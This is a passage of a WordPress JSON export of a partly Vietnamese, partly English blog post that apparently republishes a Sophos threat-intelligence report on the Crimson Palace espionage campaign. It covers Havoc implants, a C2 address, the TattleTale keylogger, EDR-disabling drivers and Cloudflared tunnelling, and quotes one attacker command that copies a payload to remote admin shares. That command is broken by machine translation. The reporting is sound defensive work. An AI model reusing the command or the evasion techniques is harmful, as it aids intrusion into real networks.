t\u1ef1 nh\u01b0 cu\u1ed9c t\u1ea5n c\u00f4ng ExecIT th\u00e1ng 3. Tr\u00ecnh t\u1ea3i shellcode trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y kh\u00f4ng \u0111\u01b0\u1ee3c ph\u1ee5c h\u1ed3i, nh\u01b0ng c\u1ea5y gh\u00e9p Havoc \u0111\u00e3 \u0111\u01b0\u1ee3c \u0111\u01b0a v\u00e0o firefox.exe v\u00e0 k\u1ebft n\u1ed1i \u0111\u1ebfn 64.176.37.107:443, gi\u1ed1ng nh\u01b0 hai trong s\u1ed1 nh\u1eefng l\u1ea7n \u0111\u01b0\u1ee3c \u0111\u01b0a v\u00e0o b\u1edfi tr\u00ecnh t\u1ea3i Donut \u0111\u00e3 l\u00e0m. 
V\u00e0o ng\u00e0y 12 th\u00e1ng 4, m\u1ed9t n\u1ed7 l\u1ef1c th\u1ee9 t\u01b0 \u0111\u1ec3 t\u1eadn d\u1ee5ng identity_helper.exe\u2014l\u1ea7n n\u00e0y \u0111\u01b0\u1ee3c \u0111\u1ed5i t\u00ean th\u00e0nh fireconf.exe\u2014\u0111\u00e3 b\u1ecb b\u1ea3o v\u1ec7 \u0111i\u1ec3m cu\u1ed1i c\u1ee7a Sophos ch\u1eb7n ngay l\u1eadp t\u1ee9c.&nbsp;<\/p>\n\n\n\n<p>C\u00f9ng th\u1eddi \u0111i\u1ec3m \u0111\u00f3, c\u00e1c t\u00e1c nh\u00e2n \u0111\u00e3 tri\u1ec3n khai m\u1ed9t bi\u1ebfn th\u1ec3 tr\u00ecnh t\u1ea3i shellcode c\u1ee7a msedge_elf.dll d\u01b0\u1edbi d\u1ea1ng m\u1ed9t t\u1ec7p th\u1ef1c thi \u0111\u1ed9c l\u1eadp (pp.exe).&nbsp;&nbsp;<\/p>\n\n\n\n<p>cmd \/c &#8220;sao ch\u00e9p c:\\users\\public\\temp.log \\\\172.xxx.xxx.xxx\\c$\\windows\\temp &amp;&amp; sao ch\u00e9p c:\\users\\public\\pp.exe\\\\172.xxx.xxx.xxx \\c$\\perflogs\\conhost.exe&#8221;&nbsp;<\/p>\n\n\n\n<p>C\u0169ng v\u00e0o \u0111\u1ea7u th\u00e1ng 4, ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y hai c\u00f4ng c\u1ee5 keylogger kh\u00e1c nhau \u0111\u01b0\u1ee3c tri\u1ec3n khai \u0111\u1ebfn c\u00f9ng m\u1ed9t m\u00e1y ch\u1ee7 c\u00f9ng m\u1ed9t l\u00fac, m\u1ed9t trong s\u1ed1 \u0111\u00f3 l\u00e0 ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i ch\u01b0a \u0111\u01b0\u1ee3c b\u00e1o c\u00e1o tr\u01b0\u1edbc \u0111\u00f3 m\u00e0 ch\u00fang t\u00f4i \u0111\u1eb7t t\u00ean l\u00e0 TattleTale \u2014 m\u1ed9t keylogger c\u00f3 c\u00e1c kh\u1ea3 n\u0103ng b\u1ed5 sung. Ch\u00fang t\u00f4i \u0111\u00e3 quan s\u00e1t th\u1ea5y vi\u1ec7c s\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 n\u00e0y s\u1edbm nh\u1ea5t l\u00e0 v\u00e0o th\u00e1ng 8 n\u0103m 2023 nh\u01b0ng tr\u01b0\u1edbc \u0111\u00f3 kh\u00f4ng th\u1ec3 ch\u1ee5p \u0111\u01b0\u1ee3c m\u1eabu. 
The keyloggers were deployed against specifically targeted administrative user accounts and other accounts of interest.<\/p>\n\n\n\n<p>TattleTale was deployed as the file r2.exe and was written to disk by identity_helper.exe. According to Sophos X-Ops analysis, the malware can fingerprint the compromised system and check mounted physical and network drives by impersonating the logged-in user. TattleTale also collects the domain controller name and steals the LSA (Local Security Authority) Query Information Policy, which is known to contain sensitive information related to password policy, security settings, and sometimes cached passwords. TattleTale's keylogging capabilities include collecting Edge and Chrome browser and storage data, saving the collected data to a .pvk file named after the victim organization.
The keylogger's output location is hardcoded into the sample, so its output directory likely varies from sample to sample.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"http:\/\/aws.vacif.com\/wp-content\/uploads\/sites\/3\/2024\/09\/crimson-palace-tro-lai-cong-cu-chien-thuat-va-muc-tieu-moi-5-1024x570.png\" alt=\"\" class=\"wp-image-20416\"\/><figcaption class=\"wp-element-caption\"><em>Figure 5: Screenshot of the TattleTale malware command line<\/em><\/figcaption><\/figure>\n\n\n\n<p>The actors deployed the keylogger r1.exe together with two drivers, C:\\users\\public\\rsndispot.sys and C:\\users\\public\\kl.sys, to temporarily disable EDR telemetry. r1.exe was executed by a file named 2.bat and established communications to a loopback address.
r1.exe then accessed Chrome's protected database files.<\/p>\n\n\n\n<p>On the same targeted administrative system, the actors also deployed another keylogger (&#8216;c:\\users\\public\\dd.dat&#8217;), whose output was saved as a .dat file (&#8216;C:\\Users\\Public\\log.dat&#8217;).<\/p>\n\n\n\n<p><strong>June 2024: Cloudflared<\/strong><\/p>\n\n\n\n<p>On June 13, in another move more reminiscent of cybercriminal intrusions, the actors used Impacket to install the Cloudflared tunnel client on a single device. Before the installation, they had managed to disable endpoint telemetry from the target device, so the tunnel deployment was not reported until incident response re-enabled endpoint protection later that month.<\/p>\n\n\n\n<p><strong>Conclusion<\/strong><\/p>\n\n\n\n<p>The intrusions and activity documented in this report are ongoing.
We continue to see signs of the threat activity clusters identified in our initial report as they attempt to break into other Sophos customer networks in the same region.<\/p>\n\n\n\n<p>Throughout the engagement, the adversary appeared to continuously test and refine their techniques, tools, and operations. As we rolled out countermeasures against their custom malware, they combined their custom-developed tools with generic, open-source tools commonly used by legitimate penetration testers, experimenting with different combinations.<\/p>\n\n\n\n<p>This cyberespionage campaign was detected through Sophos MDR's human-led threat hunting service, which plays a key role in proactively identifying threat activity.
Beyond enhancing MDR operations, the MDR threat hunting service also feeds our X-Ops malware analysis pipeline to deliver improved protection and detection.<\/p>\n\n\n\n<p>The investigation into this campaign demonstrates the importance of an effective intelligence cycle, outlining how a threat hunt that starts from an escalated detection can generate intelligence to develop new detections and launch additional hunts.<\/p>\n\n\n\n<p>Indicators of compromise for this additional Crimson Palace activity are available on the Sophos GitHub page <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/crimson_palace_2.csv\">here<\/a>. For insight into the threat hunt behind this nearly two-year cyberespionage campaign, register for the webinar \u201c<a href=\"https:\/\/events.sophos.com\/operation-crimson-palace\/\">Intrigue of the Hunt: Operation Crimson Palace: Exposing a Multi-Headed State-Sponsored Campaign<\/a>\u201d.
<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Chinese cyberespionage campaign continues its efforts across multiple organizations in Southeast Asia, combining tactics and expanding its efforts. Written by Mark Parsons, Morgan Demboski, Sean Gallagher. September 10, 2024. After a brief pause in activity, Sophos X-Ops continues [&hellip;]<\/p>\n","protected":false},"author":13,"featured_media":20568,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"
ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[80,10],"tags":[497,493],"
class_list":["post-20428","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-huong-dan-tai-lieu","category-tin-tuc","tag-mdr","tag-sophos-x-ops","entry","has-media"],"_links":{"self":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts\/20428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/users\/13"}],"replies":[{"embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/comments?post=20428"}],"version-history":[{"count":1,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts\/20428\/revisions"}],"predecessor-version":[{"id":20578,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/posts\/20428\/revisions\/20578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/media\/20568"}],"wp:attachment":[{"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/media?parent=20428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/categories?post=20428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/vacif.com\/en\/wp-json\/wp\/v2\/tags?post=20428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}